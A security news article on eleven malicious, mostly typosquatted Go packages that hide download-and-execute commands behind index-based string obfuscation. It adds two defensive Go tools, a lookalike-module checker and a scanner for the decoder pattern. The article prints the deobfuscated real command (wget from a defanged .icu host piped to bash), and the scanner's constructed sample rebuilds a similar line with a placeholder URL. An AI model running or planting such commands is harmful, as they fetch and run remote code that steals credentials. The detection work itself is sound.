Threat Actors Weaponize Malicious Go Packages to Deliver Obfuscated Remote Payloads
Cybersecurity researchers have uncovered a sophisticated malware campaign targeting the Go ecosystem through eleven malicious packages that employ advanced obfuscation techniques to deliver second-stage payloads.
The campaign demonstrates a concerning evolution in supply chain attacks, leveraging the decentralized nature of Go’s module system to distribute malicious code that can compromise both Linux build servers and Windows workstations.
The malicious packages utilize identical index-based string obfuscation routines that conceal their true functionality from static analysis tools.
At runtime, the code silently spawns system shells and retrieves executable payloads from command and control servers hosted on interchangeable .icu and .tech domains.
Most concerning is that ten of these packages remain active on the Go Module registry, providing threat actors with persistent access to any development environment that imports them.
Socket.dev analysts identified that eight of the eleven packages are sophisticated typosquats of legitimate Go modules, carefully crafted to appear trustworthy to developers conducting routine dependency searches.
The researchers discovered that six of the ten malicious URLs remain reachable, indicating an active and ongoing threat to the software development community.
The attack vector exploits Go’s decentralized package management system, where modules are imported directly from GitHub repositories rather than through centralized registries like npm or PyPI.
This creates namespace confusion that attackers exploit by creating similarly named modules with different maintainers, making it challenging for developers to distinguish legitimate packages from malicious impostors.
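The namespace confusion described above is something a build pipeline can check for mechanically. The following is an added example, not code from Socket's report or from any of the packages it names: it parses the require directives of a go.mod file and flags any required module whose path is within a couple of edits of a reviewed (allow-listed) module path, or that reuses a reviewed module's repository name under a different owner. The go.mod contents, the allow list and every module path in them are constructed placeholders, not real projects.

```go
package main

import (
	"fmt"
	"strings"
)

// Suspect is a go.mod requirement that resembles an allow-listed module
// without being one.
type Suspect struct {
	Module  string // the required module path
	Similar string // the allow-listed path it resembles
	Reason  string
}

// sampleGoMod is a CONSTRUCTED go.mod; the module paths are placeholders.
const sampleGoMod = `module example.com/app

go 1.22

require (
	github.com/example-org/configlib v1.4.0
	github.com/exampleorg/configlib v1.4.1
	github.com/other-org/configlib v0.1.0
	golang.org/x/text v0.14.0
)
`

// allowList holds module paths the organisation has reviewed (constructed).
var allowList = []string{"github.com/example-org/configlib", "golang.org/x/text"}

// requiredModules extracts module paths from single-line and block
// require directives of a go.mod file.
func requiredModules(gomod string) []string {
	var mods []string
	inBlock := false
	for _, line := range strings.Split(gomod, "\n") {
		fields := strings.Fields(line)
		switch {
		case len(fields) == 0 || strings.HasPrefix(fields[0], "//"):
		case fields[0] == "require" && len(fields) > 1 && fields[1] == "(":
			inBlock = true
		case inBlock && fields[0] == ")":
			inBlock = false
		case fields[0] == "require" && len(fields) >= 3:
			mods = append(mods, fields[1])
		case inBlock && len(fields) >= 2:
			mods = append(mods, fields[0])
		}
	}
	return mods
}

func min3(a, b, c int) int {
	if b < a {
		a = b
	}
	if c < a {
		a = c
	}
	return a
}

// levenshtein returns the edit distance between a and b.
func levenshtein(a, b string) int {
	prev := make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur := make([]int, len(b)+1)
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 1
			if a[i-1] == b[j-1] {
				cost = 0
			}
			cur[j] = min3(prev[j]+1, cur[j-1]+1, prev[j-1]+cost)
		}
		prev = cur
	}
	return prev[len(b)]
}

// FindLookalikes flags required modules that are within maxDist edits of
// an allow-listed path, or share its repository name under another owner.
func FindLookalikes(gomod string, allow []string, maxDist int) []Suspect {
	allowed := map[string]bool{}
	for _, ok := range allow {
		allowed[ok] = true
	}
	var out []Suspect
	for _, mod := range requiredModules(gomod) {
		if allowed[mod] {
			continue // exact match with a reviewed module
		}
		for _, ok := range allow {
			modBase := mod[strings.LastIndex(mod, "/")+1:]
			okBase := ok[strings.LastIndex(ok, "/")+1:]
			if d := levenshtein(mod, ok); d <= maxDist {
				out = append(out, Suspect{mod, ok, fmt.Sprintf("%d edit(s) from allow-listed path", d)})
				break
			} else if modBase == okBase {
				out = append(out, Suspect{mod, ok, "same repository name under a different owner"})
				break
			}
		}
	}
	return out
}

func main() {
	for _, s := range FindLookalikes(sampleGoMod, allowList, 2) {
		fmt.Printf("%s resembles %s: %s\n", s.Module, s.Similar, s.Reason)
	}
}
```

Run against the constructed go.mod, the checker reports the module that differs from the reviewed path by one dropped hyphen and the one that reuses the repository name under a different owner, while the two exact matches pass. The edit-distance threshold is a heuristic; a low threshold keeps noise down but misses lookalikes that differ by a whole word, which is why the owner-name rule is applied as well.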
Obfuscation and Payload Delivery Mechanism
The malware employs a consistent obfuscation technique across all packages, utilizing array-driven decoders to reconstruct malicious commands at runtime.
The obfuscated code follows a predictable pattern, establishing string arrays and calling different indices to construct system commands that download and execute remote payloads.
For example, the package github.com/expertsandba/opt contains obfuscated code that, when deobfuscated, executes: /bin/sh -c wget -O - https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &
This command downloads a bash script directly into memory and executes it in the background without writing to disk, enabling stealthy payload delivery.
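Because the decoder pattern is the same across the packages (a string slice whose indices are concatenated into a command at runtime), it is a good candidate for a static check run over third-party module source before it is built. The following is an added example written for this article, not Socket's tooling or code from the malicious packages: it uses the standard go/ast parser to flag any function that both calls os/exec's Command* functions and reads several elements out of package-level string slices. The sample source it scans is constructed to mimic the shape the report describes; the slice contents and URL are placeholders, not the real payload.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)

// Finding is one function the heuristic flagged.
type Finding struct {
	Func       string // flagged function name
	Line       int    // line of its declaration
	IndexCount int    // string-slice index expressions in its body
}

// A function that shells out AND reads at least this many elements from
// package-level string slices gets flagged (heuristic threshold).
const minIndexedParts = 3

// sampleSource is a CONSTRUCTED sample in the shape the report describes:
// a string slice whose indices are concatenated into a shell command at
// runtime. It is not any real package's code; the URL is a placeholder.
const sampleSource = `package opt
import "os/exec"
var parts = []string{"sh", "/bin/", "-c", "wget", " -O - ", "http://placeholder.invalid/x", " | ", "bash", " &"}
func Init() {
	cmd := parts[1] + parts[0]
	arg := parts[3] + parts[4] + parts[5] + parts[6] + parts[1] + parts[7] + parts[8]
	exec.Command(cmd, parts[2], arg).Start()
}
`

// packageStringSlices collects package-level vars initialised with a
// []string or [N]string composite literal.
func packageStringSlices(f *ast.File) map[string]bool {
	out := map[string]bool{}
	for _, decl := range f.Decls {
		gd, ok := decl.(*ast.GenDecl)
		if !ok || gd.Tok != token.VAR {
			continue
		}
		for _, spec := range gd.Specs {
			vs := spec.(*ast.ValueSpec) // a VAR GenDecl only holds ValueSpecs
			for i, val := range vs.Values {
				cl, ok := val.(*ast.CompositeLit)
				if !ok || i >= len(vs.Names) {
					continue
				}
				if at, ok := cl.Type.(*ast.ArrayType); ok {
					if elt, ok := at.Elt.(*ast.Ident); ok && elt.Name == "string" {
						out[vs.Names[i].Name] = true
					}
				}
			}
		}
	}
	return out
}

// Scan parses one Go file and flags functions that call exec.Command*
// while assembling values from package-level string-slice indices.
func Scan(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	strSlices := packageStringSlices(f)
	var findings []Finding
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Body == nil {
			continue
		}
		indexed, shellsOut := 0, false
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			switch x := n.(type) {
			case *ast.IndexExpr: // e.g. parts[3]
				if id, ok := x.X.(*ast.Ident); ok && strSlices[id.Name] {
					indexed++
				}
			case *ast.CallExpr: // e.g. exec.Command(...)
				if sel, ok := x.Fun.(*ast.SelectorExpr); ok {
					if pkg, ok := sel.X.(*ast.Ident); ok && pkg.Name == "exec" && strings.HasPrefix(sel.Sel.Name, "Command") {
						shellsOut = true
					}
				}
			}
			return true
		})
		if shellsOut && indexed >= minIndexedParts {
			findings = append(findings, Finding{fn.Name.Name, fset.Position(fn.Pos()).Line, indexed})
		}
	}
	return findings, nil
}

func main() {
	findings, err := Scan("sample.go", sampleSource)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", findings)
}
```

The scanner never executes the code it inspects; it only parses it, so it is safe to run over an untrusted module cache. It is deliberately a coarse heuristic: a function that shells out with plain string literals is not flagged, and a decoder split across several functions or using a differently typed lookup table would need the rule extended, which is the usual trade-off between a cheap pre-build check and a full taint analysis.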
The second-stage payloads demonstrate sophisticated evasion techniques, implementing a one-hour sleep delay to circumvent sandbox analysis systems.
Once activated, the malware enumerates system information, harvests browser credentials, and establishes persistent backdoor access through continuous network beaconing to external command and control infrastructure.